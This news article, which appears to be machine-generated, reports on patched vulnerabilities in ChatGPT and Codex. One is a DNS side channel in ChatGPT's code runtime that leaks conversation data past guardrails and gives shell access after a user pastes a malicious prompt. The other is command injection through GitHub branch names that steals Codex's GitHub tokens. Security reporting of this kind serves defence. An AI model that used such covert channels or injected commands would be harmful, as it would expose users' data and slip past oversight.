Ethical Hacking News
A critical vulnerability has been discovered in OpenAI's ChatGPT and Codex, allowing sensitive data to be exfiltrated without user knowledge or consent. This finding highlights the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
OpenAI's ChatGPT has a previously unknown vulnerability that allows sensitive conversation data to be exfiltrated without user knowledge or consent. The vulnerability exploits a side channel in the Linux runtime used by the AI agent for code execution and data analysis. An attacker could use this vulnerability to establish remote shell access inside the Linux runtime, achieve command execution, and compromise multiple users interacting with a shared repository. OpenAI has patched the issue as of February 5, 2026, after it was reported on December 16, 2025.
In a recent revelation, cybersecurity experts at Check Point have discovered a previously unknown vulnerability in OpenAI's ChatGPT that allows sensitive conversation data to be exfiltrated without user knowledge or consent. This finding comes as a stark warning about the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
The vulnerability, which was discovered through responsible disclosure, exploits a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" to encode information into DNS requests and get around visible AI guardrails.
The same vulnerability could be used to establish remote shell access inside the Linux runtime and achieve command execution. This creates a significant security blind spot, with the AI system assuming that the environment was isolated. As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance.
The discovery of this vulnerability has highlighted the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems. Eli Smadja, head of research at Check Point Research, stated that "don't assume AI tools are secure by default." Instead, he emphasized the importance of independent visibility and layered protection between organizations and AI vendors.
Furthermore, this vulnerability is just one of several critical issues discovered with OpenAI's Codex, a cloud-based software engineering agent. The discovery of a command injection vulnerability in Codex could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.
According to BeyondTrust Phantom Labs researcher Tyler Jespersen, the vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub.
The issue stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. As a result, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
This granted lateral movement and read/write access to a victim's entire codebase. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. Fortunately, OpenAI has patched this issue as of February 5, 2026, after it was reported on December 16, 2025.
As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary. The attack surface is expanding, and the security of these environments needs to keep pace.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Critical-Flaw-in-AI-Powered-Conversations-Uncovering-the-Vulnerabilities-in-OpenAIs-ChatGPT-and-Codex-ehn.shtml
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html
https://blog.checkpoint.com/research/when-ai-trust-breaks-the-chatgpt-data-leakage-flaw-that-redefined-ai-vendor-security-trust/
https://cloud.google.com/security/resources/insights/apt-groups
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://attack.mitre.org/tactics/TA0008/
https://www.cynet.com/network-attacks/lateral-movement-challenges-apt-and-automation/
https://apt.etda.or.th/cgi-bin/listgroups.cgi
Published: Mon Mar 30 14:45:30 2026 by llama3.2 3B Q4_K_M